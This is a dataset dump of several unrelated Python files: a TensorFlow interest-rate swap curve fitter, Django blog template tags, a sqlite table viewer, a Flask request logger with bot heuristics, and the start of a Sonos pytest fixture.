Suppose we have a set of `N` Interest Rate Swaps (IRS) `S_i` with increasing
expiries whose market prices are known.
Suppose also that the `i`th IRS issues cashflows at times `T_{ij}` where
`1 <= j <= n_i` and `n_i` is the number of cashflows (including expiry)
for the `i`th swap.
Denote by `T_i` the time of final payment for the `i`th swap
(hence `T_i = T_{i,n_i}`). This function estimates a set of rates `r(T_i)`
such that when these rates are interpolated to all other cashflow times,
the computed value of the swaps matches the market value of the swaps
(within some tolerance). Rates at intermediate times are interpolated using
the user specified interpolation method (the default interpolation method
is linear interpolation on rates).
#### Example:
The following example illustrates the usage by building an implied swap curve
from four vanilla (fixed to float) LIBOR swaps.
```python
dtype = np.float64
# Next we will set up LIBOR reset and payment times for four spot starting
# swaps with maturities 1Y, 2Y, 3Y, 4Y. The LIBOR rate spans 6M.
float_leg_start_times = [
np.array([0., 0.5], dtype=dtype),
np.array([0., 0.5, 1., 1.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5], dtype=dtype)
]
float_leg_end_times = [
np.array([0.5, 1.0], dtype=dtype),
np.array([0.5, 1., 1.5, 2.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0], dtype=dtype)
]
# Next we will set up start and end times for semi-annual fixed coupons.
fixed_leg_start_times = [
np.array([0., 0.5], dtype=dtype),
np.array([0., 0.5, 1., 1.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5], dtype=dtype)
]
fixed_leg_end_times = [
np.array([0.5, 1.0], dtype=dtype),
np.array([0.5, 1., 1.5, 2.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0], dtype=dtype)
]
# Next setup a trivial daycount for floating and fixed legs.
float_leg_daycount = [
np.array([0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype)
]
fixed_leg_daycount = [
np.array([0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype)
]
fixed_leg_cashflows = [
# 1 year swap with 2.855% semi-annual fixed payments.
np.array([-0.02855, -0.02855], dtype=dtype),
# 2 year swap with 3.097% semi-annual fixed payments.
np.array([-0.03097, -0.03097, -0.03097, -0.03097], dtype=dtype),
# 3 year swap with 3.1% semi-annual fixed payments.
np.array([-0.031, -0.031, -0.031, -0.031, -0.031, -0.031], dtype=dtype),
# 4 year swap with 3.2% semi-annual fixed payments.
np.array([-0.032, -0.032, -0.032, -0.032, -0.032, -0.032, -0.032,
-0.032], dtype=dtype)
]
# The present values of the above IRS.
pvs = np.array([0., 0., 0., 0.], dtype=dtype)
# Initial state of the curve.
initial_curve_rates = np.array([0.01, 0.01, 0.01, 0.01], dtype=dtype)
results = swap_curve_fit(float_leg_start_times, float_leg_end_times,
float_leg_daycount, fixed_leg_start_times,
fixed_leg_end_times, fixed_leg_cashflows,
fixed_leg_daycount, pvs, dtype=dtype,
initial_curve_rates=initial_curve_rates)
#### References:
[1]: <NAME> and <NAME>. Interest Rate Modeling,
Volume I: Foundations and Vanilla Models. Chapter 6. 2010.
Args:
float_leg_start_times: List of `Tensor`s. Each `Tensor` must be of rank 1
and of the same real dtype. They may be of different sizes. Each `Tensor`
represents the beginning of the accrual period for the forward rate which
determines the floating payment. Each element in the list belong to a
unique swap to be used to build the curve.
float_leg_end_times: List of `Tensor`s. Each `Tensor` must be of rank 1 and
and the same shape and of the same real dtype as the corresponding element
in `float_leg_start_times`. Each `Tensor` represents the end of the
accrual period for the forward rate which determines the floating payment.
float_leg_daycount_fractions: List of `Tensor`s. Each `Tensor` must be of
the same shape and type as `float_leg_start_times`. They may be of
different sizes. Each `Tensor` represents the daycount fraction of the
forward rate which determines the floating payment.
fixed_leg_start_times: List of `Tensor`s. Each `Tensor` must be of rank 1
and of the same real dtype. They may be of different sizes. Each `Tensor`
represents the begining of the accrual period fixed coupon.
fixed_leg_end_times: List of `Tensor`s. Each `Tensor` must be of the same
shape and type as `fixed_leg_start_times`. Each `Tensor` represents the
end of the accrual period for the fixed coupon.
fixed_leg_daycount_fractions: List of `Tensor`s. Each `Tensor` must be of
the same shape and type as `fixed_leg_start_times`. Each `Tensor`
represents the daycount fraction applicable for the fixed payment.
fixed_leg_cashflows: List of `Tensor`s. The list must be of the same length
as the `fixed_leg_start_times`. Each `Tensor` must be of rank 1 and of the
same dtype as the `Tensor`s in `fixed_leg_start_times`. The input contains
fixed cashflows at each coupon payment time including notional (if any).
The sign should be negative (positive) to indicate net outgoing (incoming)
cashflow.
present_values: List containing scalar `Tensor`s of the same dtype as
elements of `fixed_leg_cashflows`. The length of the list must be the same
as the length of `fixed_leg_cashflows`. The input contains the market
price of the underlying instruments.
present_values_settlement_times: List containing scalar `Tensor`s of the
same dtype as elements of `present_values`. The length of the list must be
the same as the length of `present_values`. The settlement times for the
present values is the time from now when the instrument is traded to the
time that the purchase price is actually delivered. If not supplied, then
it is assumed that the settlement times are zero for every bond.
Default value: `None` which is equivalent to zero settlement times.
float_leg_discount_rates: Optional `Tensor` of the same dtype as
`initial_discount_rates`. This input contains the continuously compounded
discount rates the will be used to discount the floating cashflows. This
allows the swap curve to constructed using an independent discount curve
(e.g. OIS curve). By default the cashflows are discounted using the curve
that is being constructed.
float_leg_discount_times: Optional `Tensor` of the same dtype and shape as
`float_leg_discount_rates`. This input contains the times corresponding to
the rates specified via the `float_leg_discount_rates`.
fixed_leg_discount_rates: Optional `Tensor` of the same dtype as
`initial_discount_rates`. This input contains the continuously compounded
discount rates the will be used to discount the fixed cashflows. This
allows the swap curve to constructed using an independent discount curve
(e.g. OIS curve). By default the cashflows are discounted using the curve
that is being constructed.
fixed_leg_discount_times: Optional `Tensor` of the same dtype and shape as
`fixed_leg_discount_rates`. This input contains the times corresponding to
the rates specified via the `fixed_leg_discount_rates`.
optimize: Optional Python callable which implements the algorithm used to
minimize the objective function during curve construction. It should have
the following interface:
result = optimize(value_and_gradients_function, initial_position,
tolerance, max_iterations)
`value_and_gradients_function` is a Python callable that accepts a point
as a real `Tensor` and returns a tuple of `Tensor`s of real dtype
containing the value of the function and its gradient at that point.
'initial_position' is a real `Tensor` containing the starting point of the
optimization, 'tolerance' is a real scalar `Tensor` for stopping tolerance
for the procedure and `max_iterations` specifies the maximum number of
iterations.
`optimize` should return a namedtuple containing the items: `position` (a
tensor containing the optimal value), `converged` (a boolean indicating
whether the optimize converged according the specified criteria),
`failed` (a boolean indicating if the optimization resulted in a failure),
`num_iterations` (the number of iterations used), and `objective_value` (
the value of the objective function at the optimal value).
The default value for `optimize` is None and conjugate gradient algorithm
is used.
curve_interpolator: Optional Python callable used to interpolate the zero
swap rates at cashflow times. It should have the following interface:
yi = curve_interpolator(xi, x, y)
`x`, `y`, 'xi', 'yi' are all `Tensors` of real dtype. `x` and `y` are the
sample points and values (respectively) of the function to be
interpolated. `xi` are the points at which the interpolation is
desired and `yi` are the corresponding interpolated values returned by the
function. The default value for `curve_interpolator` is None in which
case linear interpolation is used.
initial_curve_rates: Optional `Tensor` of the same dtype and shape as
`present_values`. The starting guess for the discount rates used to
initialize the iterative procedure.
Default value: `None`. If not supplied, the yields to maturity for the
bonds is used as the initial value.
instrument_weights: Optional 'Tensor' of the same dtype and shape as
`present_values`. This input contains the weight of each instrument in
computing the objective function for the conjugate gradient optimization.
By default the weights are set to be the inverse of maturities.
curve_tolerance: Optional positive scalar `Tensor` of same dtype as
elements of `bond_cashflows`. The absolute tolerance for terminating the
iterations used to fit the rate curve. The iterations are stopped when the
estimated discounts at the expiry times of the bond_cashflows change by a
amount smaller than `discount_tolerance` in an iteration.
Default value: 1e-8.
maximum_iterations: Optional positive integer `Tensor`. The maximum number
of iterations permitted when fitting the curve.
Default value: 50.
dtype: `tf.Dtype`. If supplied the dtype for the (elements of)
`float_leg_start_times`, and `fixed_leg_start_times`.
Default value: None which maps to the default dtype inferred by
TensorFlow.
name: Python str. The name to give to the ops created by this function.
Default value: `None` which maps to 'swap_curve'.
Returns:
curve_builder_result: An instance of `SwapCurveBuilderResult` containing the
following attributes.
times: Rank 1 real `Tensor`. Times for the computed discount rates. These
are chosen to be the expiry times of the supplied cashflows.
discount_rates: Rank 1 `Tensor` of the same dtype as `times`.
The inferred discount rates.
discount_factor: Rank 1 `Tensor` of the same dtype as `times`.
The inferred discount factors.
initial_discount_rates: Rank 1 `Tensor` of the same dtype as `times`. The
initial guess for the discount rates.
converged: Scalar boolean `Tensor`. Whether the procedure converged.
The procedure is said to have converged when the maximum absolute
difference in the discount factors from one iteration to the next falls
below the `discount_tolerance`.
failed: Scalar boolean `Tensor`. Whether the procedure failed. Procedure
may fail either because a NaN value was encountered for the discount
rates or the discount factors.
iterations: Scalar int32 `Tensor`. Number of iterations performed.
objective_value: Scalar real `Tensor`. The value of the ibjective function
evaluated using the fitted swap curve.
Raises:
ValueError: If the initial state of the curve is not
supplied to the function.
"""
with tf.name_scope(name or 'swap_curve'):
if optimize is None:
optimize = optimizer.conjugate_gradient_minimize
present_values = _convert_to_tensors(dtype, present_values,
'present_values')
dtype = present_values[0].dtype
if present_values_settlement_times is None:
pv_settle_times = [tf.zeros_like(pv) for pv in present_values]
else:
pv_settle_times = present_values_settlement_times
float_leg_start_times = _convert_to_tensors(dtype, float_leg_start_times,
'float_leg_start_times')
float_leg_end_times = _convert_to_tensors(dtype, float_leg_end_times,
'float_leg_end_times')
float_leg_daycount_fractions = _convert_to_tensors(
dtype, float_leg_daycount_fractions, 'float_leg_daycount_fractions')
fixed_leg_start_times = _convert_to_tensors(dtype, fixed_leg_start_times,
'fixed_leg_start_times')
fixed_leg_end_times = _convert_to_tensors(dtype, fixed_leg_end_times,
'fixed_leg_end_times')
fixed_leg_daycount_fractions = _convert_to_tensors(
dtype, fixed_leg_daycount_fractions, 'fixed_leg_daycount_fractions')
fixed_leg_cashflows = _convert_to_tensors(dtype, fixed_leg_cashflows,
'fixed_leg_cashflows')
pv_settle_times = _convert_to_tensors(dtype, pv_settle_times,
'pv_settle_times')
if instrument_weights is None:
instrument_weights = _initialize_instrument_weights(float_leg_end_times,
fixed_leg_end_times,
dtype=dtype)
else:
instrument_weights = _convert_to_tensors(dtype, instrument_weights,
'instrument_weights')
if curve_interpolator is None:
def default_interpolator(xi, x, y):
return linear.interpolate(xi, x, y, dtype=dtype)
curve_interpolator = default_interpolator
self_discounting_float_leg = False
self_discounting_fixed_leg = False
# Determine how the floating and fixed leg will be discounted. If separate
# discount curves for each leg are not specified, the curve will be self
# discounted using the swap curve.
if float_leg_discount_rates is None and fixed_leg_discount_rates is None:
self_discounting_float_leg = True
self_discounting_fixed_leg = True
float_leg_discount_rates = [0.0]
float_leg_discount_times = [0.]
fixed_leg_discount_rates = [0.]
fixed_leg_discount_times = [0.]
elif fixed_leg_discount_rates is None:
fixed_leg_discount_rates = float_leg_discount_rates
fixed_leg_discount_times = float_leg_discount_times
elif float_leg_discount_rates is None:
self_discounting_float_leg = True
float_leg_discount_rates = [0.]
float_leg_discount_times = [0.]
# Create tensors for discounting curves
float_leg_discount_rates = _convert_to_tensors(dtype,
float_leg_discount_rates,
'float_disc_rates')
float_leg_discount_times = _convert_to_tensors(dtype,
float_leg_discount_times,
'float_disc_times')
fixed_leg_discount_rates = _convert_to_tensors(dtype,
fixed_leg_discount_rates,
'fixed_disc_rates')
fixed_leg_discount_times = _convert_to_tensors(dtype,
fixed_leg_discount_times,
'fixed_disc_times')
if initial_curve_rates is not None:
initial_rates = tf.convert_to_tensor(
initial_curve_rates, dtype=dtype, name='initial_rates')
else:
# TODO(b/144600429): Create a logic for a meaningful initial state of the
# curve
raise ValueError('Initial state of the curve is not specified.')
return _build_swap_curve(float_leg_start_times,
float_leg_end_times,
float_leg_daycount_fractions,
fixed_leg_start_times,
fixed_leg_end_times,
fixed_leg_cashflows,
fixed_leg_daycount_fractions,
float_leg_discount_rates,
float_leg_discount_times,
fixed_leg_discount_rates,
fixed_leg_discount_times,
self_discounting_float_leg,
self_discounting_fixed_leg,
present_values,
pv_settle_times,
optimize,
curve_interpolator,
initial_rates,
instrument_weights,
curve_tolerance,
maximum_iterations)
def _build_swap_curve(float_leg_start_times, float_leg_end_times,
                      float_leg_daycount_fractions, fixed_leg_start_times,
                      fixed_leg_end_times, fixed_leg_cashflows,
                      fixed_leg_daycount_fractions, float_leg_discount_rates,
                      float_leg_discount_times, fixed_leg_discount_rates,
                      fixed_leg_discount_times, self_discounting_float_leg,
                      self_discounting_fixed_leg, present_values,
                      pv_settlement_times, optimize, curve_interpolator,
                      initial_rates, instrument_weights, curve_tolerance,
                      maximum_iterations):
  """Builds the zero swap curve by numerically minimizing a pricing error.

  All `*_times` / `*_cashflows` arguments are lists of rank-1 `Tensor`s, one
  entry per calibration instrument; the remaining arguments are as documented
  on the public entry point that calls this helper. Returns a
  `scc.SwapCurveBuilderResult`.
  """
  # The procedure uses optimization to estimate the swap curve as follows:
  # 1. Start with an initial state of the swap curve.
  # 2. Define a loss function which measures the deviations between model
  # prices of the IR swaps and their present values specified as input.
  # 3. Use numerical optimization (currently conjugate gradient optimization)
  # to build the swap curve such that the loss function is minimized.
  # These two inputs are unused by this implementation.
  del fixed_leg_start_times, float_leg_daycount_fractions
  # Flatten the per-instrument cashflow structure into single concatenated
  # tensors plus `calc_groups_*` segment ids mapping each cashflow back to
  # its instrument.
  curve_tensors = _create_curve_building_tensors(
      float_leg_start_times, float_leg_end_times, fixed_leg_end_times,
      pv_settlement_times)
  expiry_times = curve_tensors.expiry_times
  calc_groups_float = curve_tensors.calc_groups_float
  calc_groups_fixed = curve_tensors.calc_groups_fixed
  settle_times_float = curve_tensors.settle_times_float
  settle_times_fixed = curve_tensors.settle_times_fixed
  float_leg_calc_times_start = tf.concat(float_leg_start_times, axis=0)
  float_leg_calc_times_end = tf.concat(float_leg_end_times, axis=0)
  calc_fixed_leg_cashflows = tf.concat(fixed_leg_cashflows, axis=0)
  calc_fixed_leg_daycount = tf.concat(fixed_leg_daycount_fractions, axis=0)
  fixed_leg_calc_times = tf.concat(fixed_leg_end_times, axis=0)
  def _interpolate(x1, x_data, y_data):
    return curve_interpolator(x1, x_data, y_data)
  @make_val_and_grad_fn
  def loss_function(x):
    """Loss function for the optimization."""
    # Currently the loss function is a weighted root mean squared difference
    # between the model PV and market PV. The model PV of interest rate swaps
    # is computed as follows:
    # 1. Interpolate the swap curve at intermediate times required to compute
    # forward rates for the computation of floating cashflows.
    # 2. Interpolate swap curve or the discount curve (if a separate discount
    # curve is specified) at intermediate cashflow times.
    # 3. Compute the PV of the swap as the aggregate of floating and fixed
    # legs.
    # 4. Compute the loss (which is being minimized) as the weighted root mean
    # squared difference between the model PV (computed above) and the market
    # PV (specified as input).
    rates_start = _interpolate(float_leg_calc_times_start, expiry_times, x)
    rates_end = _interpolate(float_leg_calc_times_end, expiry_times, x)
    # Simple forward rate implied by the curve between start and end of each
    # floating accrual period.
    float_cashflows = (
        tf.math.exp(float_leg_calc_times_end * rates_end) /
        tf.math.exp(float_leg_calc_times_start * rates_start) - 1.)
    if self_discounting_float_leg:
      # Discount the floating leg off the curve being fitted.
      float_discount_rates = rates_end
      float_settle_rates = _interpolate(settle_times_float, expiry_times, x)
    else:
      # Discount the floating leg off the externally supplied curve.
      float_discount_rates = _interpolate(float_leg_calc_times_end,
                                          float_leg_discount_times,
                                          float_leg_discount_rates)
      float_settle_rates = _interpolate(settle_times_float,
                                        float_leg_discount_times,
                                        float_leg_discount_rates)
    if self_discounting_fixed_leg:
      fixed_discount_rates = _interpolate(fixed_leg_calc_times, expiry_times, x)
      fixed_settle_rates = _interpolate(settle_times_fixed, expiry_times, x)
    else:
      fixed_discount_rates = _interpolate(fixed_leg_calc_times,
                                          fixed_leg_discount_times,
                                          fixed_leg_discount_rates)
      fixed_settle_rates = _interpolate(settle_times_fixed,
                                        fixed_leg_discount_times,
                                        fixed_leg_discount_rates)
    # Discount factors relative to settlement: exp(-r(t)*t) / exp(-r(t_s)*t_s)
    calc_discounts_float_leg = (
        tf.math.exp(-float_discount_rates * float_leg_calc_times_end +
                    float_settle_rates * settle_times_float))
    calc_discounts_fixed_leg = (
        tf.math.exp(-fixed_discount_rates * fixed_leg_calc_times +
                    fixed_settle_rates * settle_times_fixed))
    # Aggregate discounted cashflows back to per-instrument PVs via the
    # segment ids.
    float_pv = tf.math.segment_sum(float_cashflows * calc_discounts_float_leg,
                                   calc_groups_float)
    fixed_pv = tf.math.segment_sum(
        calc_fixed_leg_daycount * calc_fixed_leg_cashflows *
        calc_discounts_fixed_leg, calc_groups_fixed)
    swap_pv = float_pv + fixed_pv
    # Weighted squared pricing error across instruments.
    value = tf.math.reduce_sum(input_tensor=instrument_weights *
                               (swap_pv - present_values)**2)
    return value
  optimization_result = optimize(
      loss_function, initial_position=initial_rates, tolerance=curve_tolerance,
      max_iterations=maximum_iterations)
  discount_rates = optimization_result.position
  discount_factors = tf.math.exp(-discount_rates * expiry_times)
  results = scc.SwapCurveBuilderResult(
      times=expiry_times,
      rates=discount_rates,
      discount_factors=discount_factors,
      initial_rates=initial_rates,
      converged=optimization_result.converged,
      failed=optimization_result.failed,
      iterations=optimization_result.num_iterations,
      objective_value=optimization_result.objective_value)
  return results
def _convert_to_tensors(dtype, input_array, name):
  """Converts each element of `input_array` to a named `Tensor`.

  The i-th output tensor is named '<name>_<i>' so graph nodes stay
  distinguishable in debugging tools.
  """
  return [
      tf.convert_to_tensor(element, dtype=dtype,
                           name='{}_{}'.format(name, index))
      for index, element in enumerate(input_array)
  ]
def _initialize_instrument_weights(float_times, fixed_times, dtype):
  """Computes default per-instrument weights for the fitting objective.

  Each instrument's weight is `min(1, max(1/T_float, 1/T_fixed))`, i.e. the
  inverse of the earlier of the two legs' final times capped at one, so that
  long-dated instruments do not dominate the least-squares objective.

  Args:
    float_times: List of rank-1 `Tensor`s of floating leg times, one per
      instrument.
    fixed_times: List of rank-1 `Tensor`s of fixed leg times, one per
      instrument.
    dtype: `tf.DType` of the returned weights.

  Returns:
    A list of scalar weight `Tensor`s, one per instrument.
  """
  # Note: the original implementation first created a throwaway
  # `tf.ones(len(float_times))` that was immediately overwritten; that dead
  # store has been removed.
  one = tf.ones([], dtype=dtype)
  float_times_last = tf.stack([times[-1] for times in float_times])
  fixed_times_last = tf.stack([times[-1] for times in fixed_times])
  # max(1/a, 1/b) == 1/min(a, b): inverse of the shorter leg maturity.
  weights = tf.maximum(one / float_times_last, one / fixed_times_last)
  weights = tf.minimum(one, weights)
  return tf.unstack(weights, name='instrument_weights')
# Container for the flattened, per-cashflow tensors used while fitting the
# curve (see `_create_curve_building_tensors`).
CurveFittingVars = collections.namedtuple(
    'CurveFittingVars',
    [
        # The `Tensor` of maturities at which the curve will be built.
        # Corresponds to maturities on the underlying instruments.
        'expiry_times',
        # `Tensor` containing the instrument index of each floating cashflow
        'calc_groups_float',
        # `Tensor` containing the instrument index of each fixed cashflow
        'calc_groups_fixed',
        # `Tensor` containing the settlement time of each floating cashflow
        'settle_times_float',
        # `Tensor` containing the settlement time of each fixed cashflow
        'settle_times_fixed'
    ])
def _create_curve_building_tensors(float_leg_start_times,
                                   float_leg_end_times,
                                   fixed_leg_end_times,
                                   pv_settlement_times):
  """Helper function to create tensors needed for curve construction.

  Flattens the per-instrument lists into concatenated tensors, producing for
  each cashflow the index of its owning instrument (used later as
  `tf.math.segment_sum` segment ids) and its settlement time, plus one expiry
  time per instrument. Returns a `CurveFittingVars`.
  """
  calc_groups_float = []
  calc_groups_fixed = []
  expiry_times = []
  settle_times_float = []
  settle_times_fixed = []
  num_instruments = len(float_leg_start_times)
  for i in range(num_instruments):
    # Curve node for instrument i: the later of its last float/fixed times.
    expiry_times.append(
        tf.math.maximum(float_leg_end_times[i][-1], fixed_leg_end_times[i][-1]))
    # Tag every cashflow of instrument i with index i.
    calc_groups_float.append(
        tf.fill(tf.shape(float_leg_start_times[i]), i))
    calc_groups_fixed.append(tf.fill(tf.shape(fixed_leg_end_times[i]), i))
    # Broadcast the instrument's settlement time over each of its cashflows.
    settle_times_float.append(tf.fill(tf.shape(float_leg_start_times[i]),
                                      pv_settlement_times[i]))
    settle_times_fixed.append(tf.fill(tf.shape(fixed_leg_end_times[i]),
                                      pv_settlement_times[i]))
  expiry_times = tf.stack(expiry_times, axis=0)
  calc_groups_float = tf.concat(calc_groups_float, axis=0)
  calc_groups_fixed = tf.concat(calc_groups_fixed, axis=0)
  settle_times_float = tf.concat(settle_times_float, axis=0)
  settle_times_fixed = tf.concat(settle_times_fixed, axis=0)
  return CurveFittingVars(expiry_times=expiry_times,
                          calc_groups_float=calc_groups_float,
                          calc_groups_fixed=calc_groups_fixed,
                          settle_times_float=settle_times_float,
                          settle_times_fixed=settle_times_fixed)
| StarcoderdataPython |
5135402 | """blogアプリで主に使用するフィルタ・タグ
by_the_timeタグ
人に優しい表現で、文字列を返す(n時間前)
<span class="badge badge-danger badge-pill">{% by_the_time recomment.created_at %}</span>
のようにして使います。
url_replaceタグ
キーワード検索をした際等の、他GETパラメータと?page=のページングを両立させる場合に使います。
<a href="?{% url_replace request 'page' page_obj.previous_page_number %}" aria-label="Previous">
のようにして使います。
blogフィルター
{{ post.text | linebreaksbr | blog }}
のようにして使います。
投稿画面での、[filter name]text[end]等の特殊な構文を評価するためのフィルター
"""
from django import template
from django.utils import timezone
from django.utils.html import escape
from django.utils.safestring import mark_safe, SafeData
from . import filters
register = template.Library()
@register.filter(is_safe=True, needs_autoescape=True)
def blog(value, autoescape=True):
    """Convert [filter name]text[end] markers in the body into proper HTML tags."""
    # Escape HTML etc. once before converting, unless the value is already
    # marked safe.
    autoescape = autoescape and not isinstance(value, SafeData)
    if autoescape:
        value = escape(value)
    value = filters.DefaultConverter(value).run()
    return mark_safe(value)
@register.simple_tag
def url_replace(request, field, value):
    """Return the current query string with `field` replaced by `value`.

    Used to keep other GET parameters (e.g. a search keyword) intact while
    changing pagination parameters.
    """
    params = request.GET.copy()
    params[field] = value
    return params.urlencode()
@register.simple_tag
def by_the_time(dt):
    """Return a human-friendly Japanese phrase for how long ago `dt` was."""
    elapsed_seconds = (timezone.now() - dt).total_seconds()
    elapsed_hours = int(elapsed_seconds / 3600)
    # At least a day ago -> report whole days.
    if elapsed_hours >= 24:
        return '約{0}日前'.format(int(elapsed_hours / 24))
    # Under an hour -> report minutes.
    if elapsed_hours == 0:
        return '約{0}分前'.format(int(elapsed_seconds / 60))
    # Otherwise report whole hours.
    return '約{0}時間前'.format(elapsed_hours)
| StarcoderdataPython |
9753713 | import sqlite3
import os
# Resolve the database path relative to this script so the current working
# directory does not matter.
db_abs_path = os.path.dirname(os.path.realpath(__file__)) + '/globomantics.db'
print("Options: (items, comments, categories, subcategories, all)")
table = input("Show table: ")
# Module-level connection and cursor shared by the show_* helpers below.
conn = sqlite3.connect(db_abs_path)
c = conn.cursor()
def show_items():
    """Print every item joined with its category and subcategory names."""
    try:
        items = c.execute("""SELECT
        i.id, i.title, i.description, i.price, i.image, c.name, c.id, s.name, s.id
        FROM
        items AS i
        INNER JOIN categories AS c ON i.category_id = c.id
        INNER JOIN subcategories AS s ON i.subcategory_id = s.id
        """)
        print("ITEMS")
        print("#############")
        for row in items:
            # (Stray trailing commas after the print() calls were removed;
            # they created pointless throwaway tuples.)
            print("ID: ", row[0])
            print("Title: ", row[1])
            print("Description: ", row[2])
            print("Price: ", row[3])
            print("Image: ", row[4])
            print("Category: ", row[5], "(", row[6], ")")
            print("SubCategory: ", row[7], "(", row[8], ")")
            print("\n")
    except sqlite3.Error:
        # Narrowed from a bare `except:` so programming errors and
        # KeyboardInterrupt are no longer silently swallowed.
        print("Something went wrong, please run db_init.py to initialize the database.")
        conn.close()
def show_comments():
    """Print every comment together with the title of the item it belongs to."""
    try:
        comments = c.execute("""SELECT
        c.id, c.content, i.title, i.id
        FROM
        comments AS c
        INNER JOIN items AS i ON c.item_id = i.id
        """)
        print("COMMENTS")
        print("#############")
        for row in comments:
            # (Stray trailing commas after the print() calls were removed.)
            print("ID: ", row[0])
            print("Content: ", row[1])
            print("Item: ", row[2], "(", row[3], ")")
            print("\n")
    except sqlite3.Error:
        # Narrowed from a bare `except:` so programming errors and
        # KeyboardInterrupt are no longer silently swallowed.
        print("Something went wrong, please run db_init.py to initialize the database.")
        conn.close()
def show_categories():
    """Print every row of the categories table."""
    try:
        categories = c.execute("SELECT * FROM categories")
        print("CATEGORIES")
        print("#############")
        for row in categories:
            # (Stray trailing comma after the first print() call was removed.)
            print("ID: ", row[0])
            print("Name: ", row[1])
            print("\n")
    except sqlite3.Error:
        # Narrowed from a bare `except:` so programming errors and
        # KeyboardInterrupt are no longer silently swallowed.
        print("Something went wrong, please run db_init.py to initialize the database.")
        conn.close()
def show_subcategories():
    """Print every subcategory with its parent category name."""
    try:
        subcategories = c.execute("SELECT s.id, s.name, c.name, c.id FROM subcategories AS s INNER JOIN categories AS c ON s.category_id = c.id")
        print("SUBCATEGORIES")
        print("#############")
        for row in subcategories:
            # (Stray trailing commas after the print() calls were removed.)
            print("ID: ", row[0])
            print("Name: ", row[1])
            print("Category: ", row[2], "(", row[3], ")")
            print("\n")
    except sqlite3.Error:
        # Narrowed from a bare `except:` so programming errors and
        # KeyboardInterrupt are no longer silently swallowed.
        print("Something went wrong, please run db_init.py to initialize the database.")
        conn.close()
# Map each menu option to the handler(s) it runs; 'all' runs every one in
# the same order as the individual options.
_HANDLERS = {
    "items": [show_items],
    "comments": [show_comments],
    "categories": [show_categories],
    "subcategories": [show_subcategories],
    "all": [show_items, show_comments, show_categories, show_subcategories],
}
if table in _HANDLERS:
    for handler in _HANDLERS[table]:
        handler()
else:
    print("This option does not exist.")
conn.close()
| StarcoderdataPython |
1773244 | <gh_stars>1-10
import time
import json
from flask import session, request, g, flash
from app import app
import config
# Opened once in append mode for the lifetime of the process; shared by log().
logfile = open(config.logfilename, 'a')
def log(dictionary):
    """Append `dictionary` as one JSON line and flush so entries survive a crash."""
    logfile.write(json.dumps(dictionary) + '\n')
    logfile.flush()
# Process start timestamp + per-process counter give ids unique per process.
id_prefix = str(int(time.time()))
id_counter = 0
def get_new_id():
    """Return a new id of the form '<start-timestamp>-<counter>'.

    NOTE(review): the unguarded increment of a module global assumes
    effectively single-threaded request handling — confirm deployment model.
    """
    global id_counter
    id_counter += 1
    return '%s-%d' % (id_prefix, id_counter)
@app.before_request
def before():
    """Record the request start time and reset per-request notes on `g`."""
    # time() has to have sub-second resolution for this to work
    g.response_start_time = time.time()
    g.notes = {}
# accuracy: typically less than 5% false positives and less than 20% false negatives
def seems_like_a_bot():
    """Heuristically decide whether the current request looks like a bot.

    Any missing or malformed header is itself treated as bot-like.
    """
    try:
        # url to bot's home page
        if '://' in request.headers['User-Agent']:
            return True
        # modern browsers can decode deflate
        if 'deflate' not in request.headers['Accept-Encoding']:
            return True
        # modern browsers say which mimetype they are expecting
        if request.headers['Accept'] == '*/*':
            return True
    except Exception:
        # Missing header (KeyError) or malformed value -> assume bot.
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # still propagate.
        return True
    return False
def shouldDeleteCookie(response):
    """Return True when the existing session cookie should be cleared.

    Only delete when there is a session to delete and the client requests
    Do Not Track.
    """
    return bool(session) and request.headers.get('Dnt') == '1'
def shouldSetCookie(response):
    """Return True when a new session cookie should be issued.

    No cookie if one already exists, and none for users requesting
    Do Not Track.
    """
    return 'id' not in session and request.headers.get('Dnt') != '1'
@app.after_request
def after(response):
    """Manage the session cookie and write one structured log entry per request."""
    if shouldSetCookie(response):
        session.permanent = True
        session['id'] = get_new_id()
    elif shouldDeleteCookie(response):
        session.clear()
    now = time.time()
    # Not including log write time, which might be significant.
    # We should probably do it on background.
    response_time = now - g.response_start_time
    # Session values must be JSON-serializable; decode any bytes to str.
    # `isinstance` replaces the old `type(x) == type(bytes())` comparison
    # (same intent, also covers bytes subclasses).
    for key in session:
        if isinstance(session[key], bytes):
            session[key] = session[key].decode()
    data = {
        'timestamp' : now,
        'response-time': response_time,
        #'ip' : request.remote_addr, # always 127.0.0.1 because we are behind nginx
        'path': request.path,
        'args': dict(request.args),
        'method': request.method,
        'session': dict(session),
        'request-headers': dict(request.headers),
        'form': dict(request.form),
        'response-status': response.status_code,
        'response-headers': dict(response.headers),
        'notes': g.notes
    }
    try:
        log(data)
    except Exception:
        # Best-effort logging: don't bother the user if json complains about
        # data types. Narrowed from a bare `except:` so SystemExit and
        # KeyboardInterrupt still propagate.
        pass
    return response
| StarcoderdataPython |
9721952 | import pytest
from mock import mock
from snipssonos.entities.device import Device
from snipssonos.use_cases.speaker_interrupt import SpeakerInterruptUseCase
from snipssonos.use_cases.request_objects import SpeakerInterruptRequestObject
from snipssonos.exceptions import NoReachableDeviceException
@pytest.fixture
def connected_device():
    """Return a sample `Device` representing a reachable Sonos speaker."""
    return Device(
        name="Anthony's Sonos",
        identifier="RINCON_XXXX",
        volume=10
    )
